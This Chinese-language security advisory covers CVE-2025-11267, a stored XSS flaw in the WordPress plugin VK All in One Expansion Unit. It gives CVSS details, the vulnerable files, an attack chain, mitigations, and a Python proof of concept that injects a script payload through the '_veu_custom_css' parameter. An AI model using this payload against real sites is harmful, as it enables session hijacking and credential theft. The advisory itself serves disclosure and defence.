CVE-2025-11267 WordPress VK All in One Expansion Unit插件存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-11267

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

6.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

VK All in One Expansion Unit（WordPress插件）

漏洞概述

VK All in One Expansion Unit是WordPress平台上非常流行的综合性扩展插件，提供页面定制、SEO优化、社交分享等多种功能。该插件在所有版本直至9.112.1存在一处严重的存储型跨站脚本（Stored XSS）漏洞。漏洞根源在于插件对用户提供的自定义CSS值（'_veu_custom_css'参数）缺乏充分的输入清理和输出转义处理。攻击者仅需拥有WordPress Contributor（贡献者）级别权限即可利用此漏洞，在受影响的页面中注入任意JavaScript脚本代码。当其他用户访问这些被注入恶意代码的页面时，攻击者的脚本将在受害者浏览器中执行，可能导致会话劫持、凭据窃取、恶意重定向等严重安全后果。由于该插件安装量巨大，且漏洞利用门槛较低（只需低权限账号），此漏洞对大量WordPress网站构成中度安全威胁，建议尽快更新至最新修复版本。

技术细节

该漏洞属于存储型XSS（Stored Cross-Site Scripting）类型，与传统的反射型XSS不同，恶意脚本会被永久存储在服务器端。漏洞点位于插件的Custom CSS功能模块，具体涉及两个关键文件：admin/class-veu-metabox.php（第178行附近）和inc/css-customize/css-customize-single.php（第32行附近）。在这两个文件中，插件直接获取'_veu_custom_css'参数的用户输入值，未经充分的HTML实体转义或输入验证便存储到数据库。当其他用户访问包含该CSS配置的页面时，未转义的内容会被输出到页面HTML中，浏览器将其解析为可执行脚本。攻击者利用此漏洞可执行任意JavaScript代码，包括读取用户Cookie、修改页面内容、发起进一步攻击等。由于插件允许Contributor级别用户设置自定义CSS，而该角色权限较低，使得漏洞利用门槛大幅降低。CVSS 3.1评分6.4（AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N）反映了漏洞的网络可达性、低复杂度、低权限要求和有限的机密性/完整性影响。

攻击链分析

STEP 1

1

攻击者获取WordPress Contributor级别账号或通过其他方式获得低权限账户

STEP 2

2

攻击者构造包含恶意JavaScript代码的'_veu_custom_css'参数 payload

STEP 3

3

通过WordPress admin-ajax.php或相关API接口将payload提交到服务器

STEP 4

4

插件将用户输入的Custom CSS值未经过滤直接存储到数据库

STEP 5

5

当其他用户访问包含该CSS配置的页面时，未转义的内容被输出到HTML中

STEP 6

6

受害者浏览器将恶意内容解析为可执行脚本，攻击者JavaScript代码在受害者浏览器执行

STEP 7

7

攻击者通过XSS可窃取用户Cookie、会话令牌，或进行进一步权限提升攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-11267 PoC - Stored XSS in VK All in One Expansion Unit
# Target: WordPress site with VK All in One Expansion Unit plugin <= 9.112.1
# Authentication: Requires Contributor-level account

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "contributor_user"
PASSWORD = "contributor_password"

def login_wp():
    """Login to WordPress and get authentication cookies"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    resp = session.post(login_url, data=login_data)
    if 'wordpress_logged_in' in str(session.cookies):
        return session
    return None

def exploit_stored_xss(session):
    """Inject malicious JavaScript via _veu_custom_css parameter"""
    # XSS payload - executes alert on page load
    xss_payload = '</style><script>alert(document.domain)</script><style>'
    
    # Target: Plugin's Custom CSS functionality
    post_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Create/update a post with malicious CSS
    post_data = {
        'action': 'veu_custom_css_save',
        '_veu_custom_css': xss_payload,
        'post_id': '1',
        'nonce': 'your_valid_nonce_here'  # Need valid nonce from page
    }
    
    resp = session.post(post_url, data=post_data)
    print(f"[*] Response: {resp.status_code}")
    print(f"[*] Payload injected: {xss_payload}")
    return True

if __name__ == "__main__":
    print("[*] CVE-2025-11267 PoC - VK All in One Expansion Unit Stored XSS")
    session = login_wp()
    if session:
        print("[+] Login successful")
        exploit_stored_xss(session)
        print("[+] XSS payload injected. Visit any page to trigger.")
    else:
        print("[-] Login failed")

影响范围

VK All in One Expansion Unit <= 9.112.1（所有版本直至并包括9.112.1）

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：限制低权限用户（Contributor及以下角色）对页面编辑和自定义CSS功能的访问权限；使用WordPress安全插件启用实时的XSS攻击防护和告警；实施严格的Content Security Policy以阻止内联脚本执行；考虑暂时禁用VK All in One Expansion Unit的Custom CSS功能模块；加强对WordPress用户注册和权限分配的管控，防止攻击者获取低权限账号。同时建议监控网站访问日志，关注异常的admin-ajax.php请求模式。